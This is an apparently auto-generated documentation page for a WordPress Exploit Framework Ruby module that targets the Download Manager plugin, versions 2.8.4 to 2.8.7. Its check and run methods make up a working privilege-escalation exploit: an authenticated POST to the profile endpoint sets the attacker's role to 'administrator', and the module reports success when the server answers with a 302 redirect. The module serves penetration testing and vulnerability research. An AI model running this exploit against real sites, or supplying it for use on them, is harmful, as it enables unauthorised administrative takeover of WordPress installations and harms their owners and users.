class Wpxf::Auxiliary::DownloadManagerAuthenticatedPrivilegeEscalation
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 6 def initialize super update_info( name: 'Download Manager Authenticated Privilege Escalation', desc: %( The Download Manager plugin, in versions 2.8.4 to 2.8.7, allows authenticated users to escalate their user role to that of an administrator. ), author: [ 'James Golovich', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8365'], ['URL', 'http://www.pritect.net/blog/wordpress-download-manager-2-8-8-critical-security-vulnerabilities'] ], date: 'Jan 19 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 28 def check check_plugin_version_from_readme('download-manager', '2.8.8', '2.8.4') end
requires_authentication()
click to toggle source
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 32 def requires_authentication true end
run()
click to toggle source
Calls superclass method
Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb, line 36 def run return false unless super body = { 'wpdm_profile' => { 'display_name' => username, 'role' => 'administrator' }, 'pfile_data' => { 'display_name' => username, 'role' => 'administrator' }, 'password' => password, 'cpassword' => password, 'payment_account' => '0' } mod_result = true scoped_option_change('follow_http_redirection', false) do res = execute_post_request( url: full_uri, body: body, cookie: session_cookie ) if res.code == 302 emit_success "User #{username} now has full admin rights" else emit_error 'Failed to escalate privileges' mod_result = false end end mod_result end